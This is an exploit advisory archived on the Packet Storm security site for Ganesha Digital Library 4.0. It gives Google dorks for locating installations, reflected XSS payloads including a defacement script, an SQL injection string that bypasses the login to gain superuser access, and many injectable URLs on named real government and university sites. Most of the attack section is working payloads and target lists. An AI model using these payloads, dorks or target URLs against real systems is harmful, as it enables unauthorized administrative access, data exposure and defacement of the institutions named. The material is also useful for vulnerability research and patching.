what you don't know can hurt you

Ganesha Digital Library 4.0 Cross Site Scripting / SQL Injection

Ganesha Digital Library 4.0 Cross Site Scripting / SQL Injection
Posted May 30, 2012
Authored by X-Cisadane

Ganesha Digital Library version 4.0 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
MD5 | c2045f4a38e1f4e2ee6c062ea6595d1c

Ganesha Digital Library 4.0 Cross Site Scripting / SQL Injection

Change Mirror Download
=====================================================
Ganesha Digital Library 4.0 Multiple Vulnerabilities
=====================================================

:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Ganesha Digital Library 4.0 Multiple Vulnerabilities
: # Date : 30 May 2012
: # Author : X-Cisadane
: # Software Link : kmrg.itb.ac.id
: # Version : 4.x
: # Category : Web Applications
: # Vulnerability : SQL Injection Vulnerability & NON-Persistent XSS
Vulnerability
: # Tested On : Mozilla Firefox 7.0.1 (Windows)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Dunia Santai,Jiban Crew,
CodeNesia, Axon Code, Jember Hacker, Explore Crew, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:

Description :
=============
Ganesha Digital Library (GDL) is a digital library software developed by
Knowledge Management Research Group (KMRG) Institute of Technology Bandung
(ITB) in order to harness the intellectual capital (intellectual capital)
of ITB, which includes academic articles, journals, the final task, thesis,
dissertation, research results, expertise and other directory.

Dorks :
=======
inurl:"/office.php?m="
intext:Copyright © 2002-2003 - KMRG ITB. All rights reserved
intext:This work was carried out with the aid of a grant from YLTI
Indonesia and IDRC Canada.
intitle:" - GDL 4.0"

POC :
=====
[1] NON-Persistent XSS in the Account Activation Section
There is a security flaw (NON-Persistent XSS) in the Account Activation
Section.
For the example : Open http://digilib.litbang.depkes.go.id/ AND Click
Activate Account in the left corner Menu. Then you'll be taken to Activate
Account Page, Fill this script : '"><script>alert(1337)</script> on the
Account Field and Code Field Then Click Activate.

[2] NON-Persistent XSS in the Search Section
XSS Script : '"><script>alert(1337)</script>
For Example :
http://www.djmbp.esdm.go.id/pustaka/search.php?s=[Insert XSS Script]

[3] NON-Persistent XSS in /office.php?m=lang&langid=[Insert XSS Script]
XSS Script : '"><script>alert(1337)</script>
For Example :
Type XSS Script like this --->
http://digilib.litbang.depkes.go.id/office.php?m=lang&langid='"><script>alert(1337)</script>
AND PRESS ENTER!
Then you'll be taken to Error Page.
Then edit the URL like this --->
http://digilib.litbang.depkes.go.id/office.php?m=lang&langid=en AND PRESS
ENTER!
If it Successfull, it will appear a Message Box "1337"
P.S : Login Required!

[4] NON-Persistent XSS DEFACING
XSS Script : http://digilib.litbang.depkes.go.id/publisher.php?id=<script>document.body.innerHTML="<h1>XSS
Defacing</h1>This Site Has XSSed By : X-Cisadane<br/>Greetz To : Poni,
Wilmar Kidz, Anharku, Artificial Intelligence, Winda Utari, etc<br/>Visit
http://xcode.or.id";</script>

[5] SQL Injection on The Login Form (Gain SuperUser Access!)
Open Ganesha Digital Library 4.0 Login Page
For the example : Open http://adln.lib.unair.ac.id/login.php
On the Account Field, Fill with this Symbol : '=0#
On the Password Field Don't Fill Anything!!! Then Click Login Button.
If it Successfull, you'll be got a Superuser GDL Access!
You can try another site such as :
http://digilib.litbang.depkes.go.id/login.php
http://digilib.p3gizi.litbang.depkes.go.id/login.php
http://digilib.p3skk.litbang.depkes.go.id/login.php

[6] SQL Injection on go.php?id=['SQL]
SQL Injection on go.php?id=ID BLA BLA BLA&node=['SQL]
SQL Injection on go.php?id=ID BLA BLA BLA&node=NODE ID BLA BLA
BLA&start=['SQL]
SQL Injection on go.php?id=ID BLA BLA BLA&node=NODE ID BLA BLA
BLA&start=START ID BLA BLA BLA&node=['SQL]
For Example :
http://digilib.litbang.depkes.go.id/go.php?id='jkpkbppk-gdl-grey-2011-santoso-3848
http://adln.lib.unair.ac.id/go.php?id='dlhub-gdl-s1-2012-dewantiarl-23785
http://adln.lib.unair.ac.id/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node='781&start=81&PHPSESSID=a46159e2d84c6d5fab6e581f7d3e7f3a
http://adln.lib.unair.ac.id/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node=781&start='81&PHPSESSID=a46159e2d84c6d5fab6e581f7d3e7f3a
http://adln.lib.unair.ac.id/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node=781&start=81&PHPSESSID=%27a46159e2d84c6d5fab6e581f7d3e7f3a

[7] SQL Injection on publisher.php?id=['SQL]
For Example :
http://digilib.litbang.depkes.go.id/publisher.php?id=%27JBPEDONFAU

[8] SQL Injection on go.php?node=['SQL]
For Example :
http://digilib.litbang.depkes.go.id/go.php?node='191
http://digilib.p3gizi.litbang.depkes.go.id/go.php?node='25
http://digilib.p3skk.litbang.depkes.go.id/go.php?node='32
P.S : Login Required!

[9] SQL Injection on office.php?m=explorer&a=['SQL]&b=expand&w=0
For Example :
http://digilib.litbang.depkes.go.id/office.php?m=explorer&a='191&b=expand&w=0
http://digilib.p3gizi.litbang.depkes.go.id/office.php?m=explorer&a='25&b=expand&w=0
http://digilib.p3skk.litbang.depkes.go.id/office.php?m=explorer&a='16&b=expand&w=0
P.S : Login Required!

[10] SQL Injection on office.php?m=user&a=['SQL]
For Example :
http://digilib.litbang.depkes.go.id/office.php?m=user&a='pdsony@idola.net.id&b=edit
P.S : Login Required!

[11] SQL Injction on office.php?m=workgroup&a=['SQL]&b=edit
For Example :
http://digilib.litbang.depkes.go.id/office.php?m=workgroup&a='1&b=edit
P.S : Login Required!

[12] SQL Injection on office.php?m=user&so=desc&sb=['SQL]
For Example :
http://digilib.litbang.depkes.go.id/office.php?m=user&so=desc&sb='FULL_NAME
http://digilib.litbang.depkes.go.id/office.php?m=user&so=asc&sb='EMAIL
http://digilib.litbang.depkes.go.id/office.php?m=user&so=asc&sb='GID
http://digilib.litbang.depkes.go.id/office.php?m=user&so=asc&sb='CONFIRM
P.S : Login Required!
Login or Register to add favorites

File Archive:

February 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    33 Files
  • 2
    Feb 2nd
    30 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    8 Files
  • 5
    Feb 5th
    11 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    1 Files
  • 8
    Feb 8th
    37 Files
  • 9
    Feb 9th
    15 Files
  • 10
    Feb 10th
    11 Files
  • 11
    Feb 11th
    26 Files
  • 12
    Feb 12th
    8 Files
  • 13
    Feb 13th
    1 Files
  • 14
    Feb 14th
    1 Files
  • 15
    Feb 15th
    9 Files
  • 16
    Feb 16th
    33 Files
  • 17
    Feb 17th
    6 Files
  • 18
    Feb 18th
    10 Files
  • 19
    Feb 19th
    20 Files
  • 20
    Feb 20th
    1 Files
  • 21
    Feb 21st
    1 Files
  • 22
    Feb 22nd
    17 Files
  • 23
    Feb 23rd
    15 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    28 Files
  • 26
    Feb 26th
    25 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close